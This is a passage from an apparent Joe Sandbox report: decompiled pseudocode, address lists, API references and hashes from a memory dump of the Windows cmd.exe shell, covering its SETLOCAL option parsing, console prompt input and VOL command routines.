0x001bda9b
0x001bda92
0x001bda74
0x001bdb50
0x001bdb53
0x001bdb59
0x001bdb5a
0x001bdb5d
0x001bdb5f
0x001bdb60
0x001bdb61
0x001bdb61
0x001bdb63
0x001bdb64
0x001bdb69
0x001bdb6b
0x001bdb6c
0x00000000
0x001bdb6c
0x001bd8f2
0x001bd8f2
0x001bd8f8
0x001bd8fb
0x001bd8fe
0x001bd905
0x001bd906
0x001bd90b
0x001bd90e
0x001bd910
0x001bd912
0x001bd912
0x00000000
0x001bd910
0x001bd8cc
0x001bd8ce
0x001bd8d0
0x001bd8d0
0x001bd8d2
0x00000000
0x001bd8d2
0x001bd8ca
0x001bd8ac
0x001c0502
0x001c050c
0x001c0512
0x001c0515
0x001c0517
0x00000000
0x001c051d
0x001c0527
0x001c052d
0x001c0530
0x001c0532
0x001c0551
0x001c0551
0x001bde5e
0x001bde60
0x001bde66
0x001bde67
0x001bde68
0x001bde6a
0x001cbca8
0x001cbcaa
0x001cbcac
0x001cbcb2
0x001cbcb2
0x001bde72
0x001bde78
0x001bde7a
0x001bde7c
0x001cbcba
0x001cbcbb
0x001cbcc3
0x001cbcc4
0x001cbcca
0x001cbccc
0x001bde82
0x001bde82
0x001bde82
0x001bde84
0x001bde84
0x001bde8b
0x001bde8c
0x001bde91
0x001bde93
0x001cbcd7
0x001cbcdb
0x00000000
0x001bde99
0x001bde9b
0x001bde9d
0x001bde9f
0x001bdea4
0x001bdea9
0x001bdeab
0x001bdee6
0x001bdee6
0x001bdee7
0x001bdee9
0x001bdeea
0x001bdeeb
0x001bdead
0x001bdeaf
0x001bdeb0
0x001bdeb5
0x001bdeba
0x001bdeee
0x001bdef0
0x001bdef2
0x00000000
0x001bdebc
0x001bdebc
0x001bdec1
0x001bdec4
0x001bdec9
0x001bdecb
0x001cbce6
0x001cbcf2
0x001cbcf8
0x001cbcf9
0x001cbcfb
0x001cbd01
0x001cbd03
0x001cbd03
0x001bdfb0
0x001bdfb1
0x001bdfb2
0x001bdfb4
0x001bdfb5
0x001bded1
0x001bded1
0x001bded7
0x001bdede
0x001bdee1
0x00000000
0x001bdee1
0x001bdecb
0x001bdeba
0x001bdeab
0x001c0534
0x001c053e
0x001c0544
0x001c0547
0x001c0549
0x00000000
0x001c054b
0x001c054b
0x001bed82
0x001bed83
0x001bed85
0x001bed88
0x001bed89
0x001bed8a
0x001bed8d
0x001bed94
0x001bed95
0x001bed95
0x001bed97
0x001bed9f
0x001beda1
0x001beda4
0x001beda4
0x001beda9
0x001bedab
0x00000000
0x00000000
0x001bedad
0x001bedb2
0x001bedb7
0x001bedbc
0x001bede9
0x001bedec
0x001bedf2
0x001bedf4
0x001cc0ad
0x001cc0b0
0x001cc0b0
0x001cc0b3
0x001cc0b6
0x001cc0b6
0x001cc0bb
0x001cc0bf
0x001cc0bf
0x001bedfa
0x001bee02
0x001bee04
0x001bee07
0x001bee09
0x001cc0f7
0x001cc103
0x001cc109
0x001cc10a
0x001cc111
0x001cc117
0x001cc117
0x001befe1
0x001befe1
0x001befe3
0x001befea
0x001befef
0x001cc121
0x001cc123
0x001cc125
0x001cc125
0x001beff5
0x001beff7
0x001beff8
0x001beff9
0x001beffa
0x001beffb
0x001bee0f
0x001bee0f
0x001bee12
0x001bee14
0x001cc0c7
0x001cc0c9
0x001cc0cb
0x001cc0cb
0x001bee1a
0x001bee1c
0x001bee1e
0x001cc0d5
0x001cc0d5
0x001bee24
0x001bee24
0x001bee2a
0x00000000
0x00000000
0x001bee2a
0x001bee30
0x001bee32
0x001cc0f0
0x001cc0f0
0x001bee38
0x001bee38
0x001bee3a
0x001bee3c
0x001bee3e
0x001bee40
0x001cc0eb
0x001cc0eb
0x00000000
0x001bee46
0x001bee46
0x001bee46
0x001bee49
0x00000000
0x00000000
0x001cc0df
0x001cc0e2
0x001cc0e2
0x001cc0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001cc0e5
0x001bee4f
0x001bee51
0x00000000
0x001bee57
0x001bee57
0x001bee59
0x001bee59
0x001bee59
0x001bee51
0x001bee40
0x001bee5b
0x001bee5b
0x001bee5d
0x001bee5f
0x001bee62
0x001bee64
0x001bee67
0x001bee67
0x001bee69
0x001bee99
0x001bee99
0x001bee6b
0x001bee6b
0x001bee6d
0x001bee73
0x001bee75
0x001bee7a
0x001bee7c
0x001bee7c
0x001bee80
0x001bee80
0x001bee82
0x00000000
0x00000000
0x001bee84
0x001bee88
0x001bee8b
0x00000000
0x001bee8d
0x001bee8d
0x001bee90
0x001bee91
0x001bee94
0x001bee94
0x001bee97
0x00000000
0x00000000
0x00000000
0x00000000
0x001bee97
0x00000000
0x001bee8b
0x001bee9e
0x001beea0
0x00000000
0x00000000
0x001beea0
0x001beea2
0x001beea2
0x001beea5
0x001beea5
0x001beea7
0x001beea7
0x001beeaa
0x00000000
0x001beeaa
0x001bedbe
0x001bedbe
0x001bedc1
0x001bedc3
0x001bedc8
0x001bedca
0x001beeb2
0x001beeb4
0x001beeb4
0x001beeb4
0x001beeb7
0x001beeb9
0x001beebc
0x001beebc
0x001beec0
0x00000000
0x001bedd0
0x001bedd1
0x001bedd3
0x001bedd3
0x001bedd5
0x00000000
0x001bedd5
0x001bedca
0x00000000
0x001bedbc
0x001bedda
0x001beddd
0x001bedde
0x001bede1
0x001bede3
0x001bede4
0x001bede5
0x001bede7
0x001bede8
0x001bede8
0x001c0549
0x001c0532
0x001c0517
0x001c04fc
0x001c04e1
0x001c04c6
0x00000000

APIs

_wcsicmp.MSVCRT ref: 001C04BB
_wcsicmp.MSVCRT ref: 001C04D6
_wcsicmp.MSVCRT ref: 001C04F1
_wcsicmp.MSVCRT ref: 001C050C
_wcsicmp.MSVCRT ref: 001C0527
_wcsicmp.MSVCRT ref: 001C053E

Strings

REM/?, xrefs: 001C0539
IF/?, xrefs: 001C0507
FOR, xrefs: 001C04B6
REM, xrefs: 001C0522
FOR/?, xrefs: 001C04D1

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmp
String ID: FOR$FOR/?$IF/?$REM$REM/?
API String ID: 2081463915-3874590324
Opcode ID: 0e156421a9855b15072fbc7832018f60ac0db51c209dedcdbc01adf93d270213
Instruction ID: ef29030eccc4afba15ad454e14e9391e882db06f8a6864ee0b41fac73c0598fb
Opcode Fuzzy Hash: 0e156421a9855b15072fbc7832018f60ac0db51c209dedcdbc01adf93d270213
Instruction Fuzzy Hash: D431D830744641C7DB267778BC46BBD3290ABA8741F04803EF946D96D0DFB0C98BCA56

Uniqueness

Uniqueness Score: -1.00%

Function 001D474C Relevance: 18.2, APIs: 12, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E001D474C(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v2060;
				char _v2061;
				char _v2062;
				signed int _v2068;
				long _v2072;
				long _v2076;
				void* _v2080;
				intOrPtr _v2088;
				signed int _t36;
				long* _t38;
				void* _t40;
				signed int _t43;
				long _t44;
				wchar_t* _t45;
				void* _t48;
				void* _t49;
				void* _t53;
				void* _t58;
				signed int _t60;
				void* _t61;
				intOrPtr _t63;
				wchar_t* _t70;
				long _t71;
				wchar_t* _t72;
				wchar_t* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t89;
				void* _t102;
				long _t103;
				wchar_t* _t104;
				void* _t106;
				wchar_t* _t107;
				signed int _t108;

				_t99 = __edx;
				_t36 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t36 ^ _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v2061 = 0;
				_v2062 = 0;
				_t38 = E001BDF40(__ecx);
				if(_t38 == 0) {
					L3:
					_t40 = 1;
					goto L4;
				} else {
					_t82 = _t38;
					_t107 = E001C2430(_t38);
					_t43 =  *_t107 & 0x0000ffff;
					if(_t43 != 0) {
						_t103 = 0x22;
						if(_t43 == _t103) {
							_t5 =  &(_t107[0]); // 0x2
							_t107 = E001C2430(_t5);
							_t74 = wcsrchr(_t107, _t103);
							if(_t74 != 0) {
								 *_t74 = 0;
							}
						}
						_t44 = 0x3d;
						_t45 = wcschr(_t107, _t44);
						_pop(_t82);
						if(_t45 == 0) {
							goto L2;
						} else {
							 *_t45 = 0;
							_t6 =  &(_t45[0]); // 0x2
							_t82 = _t6;
							_t104 = E001C2430(_t6);
							_t48 = 0x22;
							if( *_t104 == _t48) {
								_t7 =  &(_t104[0]); // 0x2
								_t70 = E001C2430(_t7);
								_t104 = _t70;
								_t71 = 0x22;
								_t72 = wcsrchr(_t104, _t71);
								_pop(_t82);
								if(_t72 != 0) {
									_t82 = 0;
									 *_t72 = 0;
								}
							}
							_t49 = 0x3d;
							if( *_t104 == _t49) {
								goto L2;
							} else {
								_t78 = GetStdHandle(0xfffffff5);
								if(GetConsoleMode(_t78,  &_v2072) != 0) {
									_v2061 = 1;
									SetConsoleMode(_t78, _v2072 | 0x00000001);
								}
								_t53 = GetStdHandle(0xfffffff6);
								_t87 =  &_v2076;
								_v2080 = _t53;
								if(GetConsoleMode(_t53,  &_v2076) != 0) {
									_t87 = _v2076 | 0x00000007;
									_v2062 = 1;
									SetConsoleMode(_v2080, _v2076 | 0x00000007);
								}
								E001BC108(_t87, 0x2371, 1, _t104);
								_v2060 = 0;
								_t58 = GetStdHandle(0xfffffff6);
								_t99 =  &_v2060;
								_t88 = _t58;
								if(E001D3B11(_t58,  &_v2060, 0x3ff,  &_v2068) == 0) {
									L23:
									_t60 = 0;
									_v2068 = 0;
								} else {
									_t60 = _v2068;
									if(_t60 == 0) {
										goto L23;
									} else {
										_t88 = _t108 + _t60 * 2 - 0x80a;
										while( *_t88 < 0x20) {
											_t60 = _t60 - 1;
											_t88 = _t88 - 2;
											_v2068 = _t60;
											if(_t60 != 0) {
												continue;
											} else {
											}
											goto L24;
										}
									}
								}
								L24:
								if(_v2061 != 0) {
									SetConsoleMode(_t78, _v2072);
									_t60 = _v2068;
								}
								if(_v2062 != 0) {
									SetConsoleMode(_v2080, _v2076);
									_t60 = _v2068;
								}
								if(_t60 == 0) {
									goto L3;
								} else {
									_t61 = _t60 + _t60;
									if(_t61 >= 0x800) {
										E001C711D(_t61, _t78, _t88, _t99, _t104, _t107);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t108);
										_t89 = _v2088;
										if( *0x1dd5fc == 2) {
											_t63 = E001D46A5(_t89, 0);
											L35:
											 *0x1eb8b0 = _t63;
											return _t63;
										}
										_t63 = E001D46A5(_t89, 0);
										if(_t63 != 0) {
											goto L35;
										}
										return _t63;
									} else {
										_t99 =  &_v2060;
										 *((short*)(_t108 + _t61 - 0x808)) = 0;
										_t40 = E001C3A50(_t107,  &_v2060);
										L4:
										_pop(_t102);
										_pop(_t106);
										_pop(_t77);
										return E001C6FD0(_t40, _t77, _v8 ^ _t108, _t99, _t102, _t106);
									}
								}
							}
						}
					} else {
						L2:
						_push(0);
						_push(0x232a);
						E001BC5A2(_t82);
						goto L3;
					}
				}
			}

0x001d474c
0x001d4757
0x001d475e
0x001d4761
0x001d4762
0x001d4765
0x001d4766
0x001d476c
0x001d4772
0x001d4779
0x001d4799
0x001d479b
0x00000000
0x001d477b
0x001d477b
0x001d4782
0x001d4784
0x001d478a
0x001d47af
0x001d47b3
0x001d47b5
0x001d47bd
0x001d47c1
0x001d47cb
0x001d47cf
0x001d47cf
0x001d47cb
0x001d47d4
0x001d47d7
0x001d47de
0x001d47e1
0x00000000
0x001d47e3
0x001d47e5
0x001d47e8
0x001d47e8
0x001d47f0
0x001d47f4
0x001d47f8
0x001d47fa
0x001d47fd
0x001d4804
0x001d4806
0x001d4809
0x001d4810
0x001d4813
0x001d4815
0x001d4817
0x001d4817
0x001d4813
0x001d481c
0x001d4820
0x00000000
0x001d4826
0x001d482e
0x001d4840
0x001d484b
0x001d4854
0x001d4854
0x001d485c
0x001d4862
0x001d4868
0x001d4878
0x001d4880
0x001d4883
0x001d4891
0x001d4891
0x001d489f
0x001d48a9
0x001d48be
0x001d48c4
0x001d48ca
0x001d48d3
0x001d48fc
0x001d48fc
0x001d48fe
0x001d48d5
0x001d48d5
0x001d48dd
0x00000000
0x001d48df
0x001d48df
0x001d48e6
0x001d48ec
0x001d48ed
0x001d48f0
0x001d48f8
0x00000000
0x00000000
0x001d48fa
0x00000000
0x001d48f8
0x001d48e6
0x001d48dd
0x001d4904
0x001d490b
0x001d4914
0x001d491a
0x001d491a
0x001d4927
0x001d4935
0x001d493b
0x001d493b
0x001d4943
0x00000000
0x001d4949
0x001d4949
0x001d4950
0x001d496e
0x001d4973
0x001d4974
0x001d4975
0x001d4976
0x001d4977
0x001d4978
0x001d4979
0x001d497a
0x001d497b
0x001d497c
0x001d497d
0x001d497e
0x001d497f
0x001d4982
0x001d4985
0x001d4991
0x001d499e
0x001d49a3
0x001d49a3
0x00000000
0x001d49a3
0x001d4993
0x001d499a
0x00000000
0x001d499c
0x001d49a9
0x001d4952
0x001d4954
0x001d495a
0x001d4964
0x001d479c
0x001d479f
0x001d47a0
0x001d47a3
0x001d47ac
0x001d47ac
0x001d4950
0x001d4943
0x001d4820
0x001d478c
0x001d478c
0x001d478c
0x001d478d
0x001d4792
0x00000000
0x001d4798
0x001d478a

APIs

Part of subcall function 001C2430: iswspace.MSVCRT ref: 001C2440

wcsrchr.MSVCRT ref: 001D47C1
wcschr.MSVCRT ref: 001D47D7
wcsrchr.MSVCRT ref: 001D4809
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001D4828
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001D4838
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001D4854
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001D485C
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001D4870
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001D4891
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 001D48BE
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001D4914
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001D4935

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
String ID:
API String ID: 4166807220-0
Opcode ID: a6bd31de7c6c3ff7e45acdded38458bb4604e17129d844a33a6ed132b78bb5a3
Instruction ID: cba365779b35b60f622d2a3c2f883afbea074b713315fabe502b58e71e2f8bb9
Opcode Fuzzy Hash: a6bd31de7c6c3ff7e45acdded38458bb4604e17129d844a33a6ed132b78bb5a3
Instruction Fuzzy Hash: 6251D4716002199BEB28AB74DC55BBA37E8FF54310F1484AAE486D6290EF708EC5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001BC430 Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155
memoryCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E001BC430() {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t21;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t37;
				char _t40;
				void* _t47;
				intOrPtr* _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t65;
				void* _t68;
				void* _t73;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t83;

				_t46 = _t83;
				_push(_t47);
				_push(_t47);
				_v8 =  *((intOrPtr*)(_t83 + 4));
				_t21 =  *0x1f3cc4;
				if(_t21 == 0) {
					L19:
					_t22 = 0;
				} else {
					if( *((intOrPtr*)(_t21 + 0x14)) >= 0x20) {
						_push(0);
						_push(0x4000271c);
						E001BC5A2(_t47);
						goto L24;
					} else {
						_t50 =  *0x1f3cb8;
						if(_t50 == 0) {
							_t50 = 0x1f3ab0;
						}
						_t68 = _t50 + 2;
						do {
							_t25 =  *_t50;
							_t50 = _t50 + 2;
						} while (_t25 != 0);
						_t73 = (_t50 - _t68 >> 1) + 1;
						_t77 = HeapAlloc(GetProcessHeap(), 8, 0xc);
						if(_t77 == 0) {
							L24:
							_t22 = 1;
						} else {
							_t53 = HeapAlloc(GetProcessHeap(), 8, _t73 + _t73);
							 *_t77 = _t53;
							if(_t53 == 0) {
								goto L24;
							} else {
								_t31 =  *0x1f3cb8;
								if( *0x1f3cb8 == 0) {
									_t31 = 0x1f3ab0;
								}
								E001C1040(_t53, _t73, _t31);
								_t33 = E001C3B2C(_t53);
								 *((intOrPtr*)(_t77 + 4)) = _t33;
								if(_t33 == 0) {
									goto L24;
								} else {
									_t54 =  *0x1f3cc4;
									 *((char*)(_t77 + 8)) =  *0x1f3cc9;
									 *((char*)(_t77 + 9)) =  *0x1f3cc8;
									 *((intOrPtr*)(_t54 + 0x90 +  *(_t54 + 0x14) * 4)) = _t77;
									_t37 =  *0x1f3cd8;
									 *(_t54 + 0x14) =  *(_t54 + 0x14) + 1;
									 *((intOrPtr*)(_t54 + 0xc)) = _t37;
									if( *((intOrPtr*)(_t54 + 0x10)) < _t37) {
										 *((intOrPtr*)(_t54 + 0x10)) = _t37;
									}
									_t78 = E001BEA40( *((intOrPtr*)( *((intOrPtr*)(_t46 + 8)) + 0x3c)), 0, 0);
									_t40 = 0;
									 *0x1eb8b0 = 0;
									while( *_t78 != _t40) {
										__imp___wcsicmp(_t78, L"ENABLEEXTENSIONS");
										if(_t40 != 0) {
											__imp___wcsicmp(_t78, L"DISABLEEXTENSIONS");
											if(_t40 == 0) {
												 *0x1f3cc9 = 0;
												goto L15;
											} else {
												__imp___wcsicmp(_t78, L"ENABLEDELAYEDEXPANSION");
												if(_t40 != 0) {
													__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
													_t65 = _t78;
													if(_t40 != 0) {
														if( *_t78 == 0) {
															goto L15;
														} else {
															_push(0);
															_push(0x400023a6);
															E001BC5A2(_t65);
															_t22 = 1;
															 *0x1eb8b0 = 1;
														}
													} else {
														 *0x1f3cc8 = _t40;
														goto L15;
													}
												} else {
													 *0x1f3cc8 = 1;
													goto L15;
												}
											}
										} else {
											 *0x1f3cc9 = 1;
											L15:
											_t78 = E001BD7E6(_t78);
											_t40 = 0;
											continue;
										}
										goto L20;
									}
									goto L19;
								}
							}
						}
					}
				}
				L20:
				return _t22;
			}

0x001bc433
0x001bc435
0x001bc436
0x001bc441
0x001bc447
0x001bc450
0x001bc58c
0x001bc58c
0x001bc456
0x001bc45a
0x001ca90c
0x001ca90e
0x001ca913
0x00000000
0x001bc460
0x001bc460
0x001bc468
0x001ca902
0x001ca902
0x001bc46e
0x001bc473
0x001bc473
0x001bc476
0x001bc479
0x001bc486
0x001bc496
0x001bc49a
0x001ca91a
0x001ca91c
0x001bc4a0
0x001bc4b3
0x001bc4b5
0x001bc4b9
0x00000000
0x001bc4bf
0x001bc4bf
0x001bc4c6
0x001ca922
0x001ca922
0x001bc4cf
0x001bc4d4
0x001bc4d9
0x001bc4de
0x00000000
0x001bc4e4
0x001bc4e4
0x001bc4ef
0x001bc4f7
0x001bc4fd
0x001bc504
0x001bc509
0x001bc50c
0x001bc512
0x001bc514
0x001bc514
0x001bc527
0x001bc529
0x001bc52b
0x001bc56c
0x001bc577
0x001bc581
0x001bc538
0x001bc542
0x001bc59b
0x00000000
0x001bc544
0x001bc54a
0x001bc554
0x001ca932
0x001ca939
0x001ca93c
0x001ca94d
0x00000000
0x001ca953
0x001ca953
0x001ca954
0x001ca959
0x001ca961
0x001ca963
0x001ca963
0x001ca93e
0x001ca93e
0x00000000
0x001ca93e
0x001bc55a
0x001bc55a
0x00000000
0x001bc55a
0x001bc554
0x001bc583
0x001bc583
0x001bc561
0x001bc568
0x001bc56a
0x00000000
0x001bc56a
0x00000000
0x001bc581
0x00000000
0x001bc56c
0x001bc4de
0x001bc4b9
0x001bc49a
0x001bc45a
0x001bc58e
0x001bc596

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 001BC489
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001BC490
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 001BC4A6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001BC4AD
_wcsicmp.MSVCRT ref: 001BC538
_wcsicmp.MSVCRT ref: 001BC54A
_wcsicmp.MSVCRT ref: 001BC577
_wcsicmp.MSVCRT ref: 001CA932

Strings

ENABLEEXTENSIONS, xrefs: 001BC571
DISABLEEXTENSIONS, xrefs: 001BC532
ENABLEDELAYEDEXPANSION, xrefs: 001BC544
DISABLEDELAYEDEXPANSION, xrefs: 001CA92C

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap_wcsicmp$AllocProcess
String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
API String ID: 435930816-3086019870
Opcode ID: e3d9cb80dc2ceb5d46c783bc54ecd9f7d863344e7081d353b5dd6bf52515b0e8
Instruction ID: 2d04a2041d8c7b02aa625323710ddf697b1bf112f06f3e41dbb8b7c23b67fb0a
Opcode Fuzzy Hash: e3d9cb80dc2ceb5d46c783bc54ecd9f7d863344e7081d353b5dd6bf52515b0e8
Instruction Fuzzy Hash: B65149313083419FD729EF38AC45AB777E4EF18314714846EE852D7682EB31E981C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 001DA834 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E001DA834(intOrPtr __ecx, DWORD* __edx) {
				signed int _v8;
				char _v524;
				int _v532;
				char _v536;
				int _v540;
				void _v1060;
				long _v1068;
				char _v1072;
				int _v1076;
				void _v1596;
				int _v1604;
				char _v1608;
				void* _v1612;
				void _v2132;
				intOrPtr _v2136;
				intOrPtr _v2140;
				signed short _v2142;
				long _v2144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				intOrPtr _t98;
				WCHAR* _t102;
				short* _t104;
				WCHAR* _t105;
				DWORD* _t107;
				signed short _t108;
				DWORD* _t120;
				void* _t131;
				WCHAR* _t133;
				short* _t134;
				WCHAR* _t136;
				short* _t138;
				intOrPtr* _t142;
				signed int _t144;
				DWORD* _t146;
				signed int _t148;

				_t141 = __edx;
				_t65 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t65 ^ _t148;
				_v2136 = __ecx;
				_t146 = 0;
				_v1604 = 0x104;
				_v1612 = 0;
				_t120 = 1;
				_t145 = __edx;
				_v1608 = 1;
				memset( &_v2132, 0, 0x104);
				_v1076 = 0;
				_v1072 = 1;
				_v1068 = 0x104;
				memset( &_v1596, 0, 0x104);
				_v540 = 0;
				_v536 = 1;
				_v532 = 0x104;
				memset( &_v1060, 0, 0x104);
				_t122 =  &_v2132;
				if(E001C0C70( &_v2132, ((0 | _v1608 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L46:
					_push(_t146);
					_push(8);
					E001BC5A2(_t122);
					_t146 = _t120;
					L47:
					_t120 = _t146;
					L48:
					_t147 = _t120;
					L49:
					__imp__??_V@YAXPAX@Z(_v540);
					__imp__??_V@YAXPAX@Z(_v1076);
					__imp__??_V@YAXPAX@Z();
					return E001C6FD0(_t147, _t120, _v8 ^ _t148, _t141, _t145, _t147, _v1612);
				}
				_t122 =  &_v1596;
				if(E001C0C70( &_v1596, ((0 | _v1072 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				_t122 =  &_v1060;
				if(E001C0C70( &_v1060, ((0 | _v536 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				E001C0D89(_t141, _t145);
				_t131 = _v1612;
				_t142 = _t131;
				if(_t131 == 0) {
					_t142 =  &_v2132;
				}
				_t145 = _t142 + 2;
				do {
					_t98 =  *_t142;
					_t142 = _t142 + 2;
				} while (_t98 != _t146);
				_t99 = _v540;
				_t144 = _t142 - _t145 >> 1;
				if(_v540 == 0) {
					_t99 =  &_v1060;
				}
				if(_t131 == 0) {
					_t131 =  &_v2132;
				}
				_t141 = _t144 + 1;
				if(E001C4C89(_t131, _t144 + 1, _t99, _v532) == 0) {
					goto L47;
				} else {
					E001C0CF2(_t141, "\\");
					_t133 = _v1076;
					if(_t133 == 0) {
						_t133 =  &_v1596;
					}
					_t102 = _v540;
					if(_t102 == 0) {
						_t102 =  &_v1060;
					}
					_t141 =  &_v2144;
					if(GetVolumeInformationW(_t102, _t133, _v1068,  &_v2144, _t146, _t146, _t146, _t146) != 0) {
						_t104 = _v540;
						_t134 = _t104;
						if(_t104 == 0) {
							_t134 =  &_v1060;
						}
						if( *_t134 != 0x5c) {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							 *((short*)(_t104 + 2)) = 0;
							goto L31;
						} else {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							_t138 = _t104;
							while( *_t104 != _t146) {
								_t138 = _t104;
								_t104 = _t104 + 2;
							}
							 *_t138 = 0;
							L31:
							_t105 = _v1076;
							_t136 = _t105;
							if(_t105 == 0) {
								_t136 =  &_v1596;
							}
							if( *_t136 == _t146) {
								_t106 = _v540;
								if(_v540 == 0) {
									_t106 =  &_v1060;
								}
								_t145 = _v2136;
								_t107 = E001D7C83(_t120, _t141, _v2136, 0x235e, _t120, _t106);
							} else {
								if(_t105 == 0) {
									_t105 =  &_v1596;
								}
								_t137 = _v540;
								if(_v540 == 0) {
									_t137 =  &_v1060;
								}
								_t145 = _v2136;
								_push(_t105);
								_t107 = E001D7C83(_t120, _t141, _v2136, 0x235f, 2, _t137);
							}
							_t147 = _t107;
							if(_t107 == 0) {
								_t108 = _v2144;
								if(_t108 != 0 || _v2140 != _t108) {
									_push(_t108 & 0x0000ffff);
									E001C274C( &_v524, 0x100, L"%04X-%04X", _v2142 & 0x0000ffff);
									_t147 = E001D7C83(_t120, _t141, _t145, 0x235b, _t120,  &_v524);
								}
							}
							goto L49;
						}
					} else {
						if(GetLastError() == 0x90) {
							goto L47;
						}
						_push(_t146);
						_push(GetLastError());
						E001BC5A2(_t133);
						goto L48;
					}
				}
			}

0x001da834
0x001da83f
0x001da846
0x001da851
0x001da858
0x001da85a
0x001da862
0x001da86e
0x001da871
0x001da873
0x001da879
0x001da881
0x001da88c
0x001da892
0x001da8a1
0x001da8a9
0x001da8b4
0x001da8ba
0x001da8c9
0x001da8d0
0x001da8f5
0x001dab2f
0x001dab2f
0x001dab30
0x001dab32
0x001dab39
0x001dab3b
0x001dab3b
0x001dab3d
0x001dab3d
0x001dab3f
0x001dab45
0x001dab52
0x001dab5f
0x001dab78
0x001dab78
0x001da8fd
0x001da91f
0x00000000
0x00000000
0x001da927
0x001da949
0x00000000
0x00000000
0x001da956
0x001da95b
0x001da961
0x001da965
0x001da967
0x001da967
0x001da96d
0x001da970
0x001da970
0x001da973
0x001da976
0x001da97b
0x001da983
0x001da987
0x001da989
0x001da989
0x001da991
0x001da993
0x001da993
0x001da99f
0x001da9a8
0x00000000
0x001da9ae
0x001da9b9
0x001da9be
0x001da9c6
0x001da9c8
0x001da9c8
0x001da9ce
0x001da9d6
0x001da9d8
0x001da9d8
0x001da9e2
0x001da9f9
0x001daa20
0x001daa26
0x001daa2a
0x001daa2c
0x001daa2c
0x001daa36
0x001daa59
0x001daa5b
0x001daa5b
0x001daa63
0x00000000
0x001daa38
0x001daa3a
0x001daa3c
0x001daa3c
0x001daa42
0x001daa4b
0x001daa46
0x001daa48
0x001daa48
0x001daa52
0x001daa67
0x001daa67
0x001daa6d
0x001daa71
0x001daa73
0x001daa73
0x001daa7c
0x001daab2
0x001daaba
0x001daabc
0x001daabc
0x001daac2
0x001daad0
0x001daa7e
0x001daa80
0x001daa82
0x001daa82
0x001daa88
0x001daa90
0x001daa92
0x001daa92
0x001daa98
0x001daa9e
0x001daaa8
0x001daaad
0x001daad8
0x001daadc
0x001daade
0x001daae6
0x001daaf3
0x001dab0d
0x001dab2b
0x001dab2b
0x001daae6
0x00000000
0x001daadc
0x001da9fb
0x001daa06
0x00000000
0x00000000
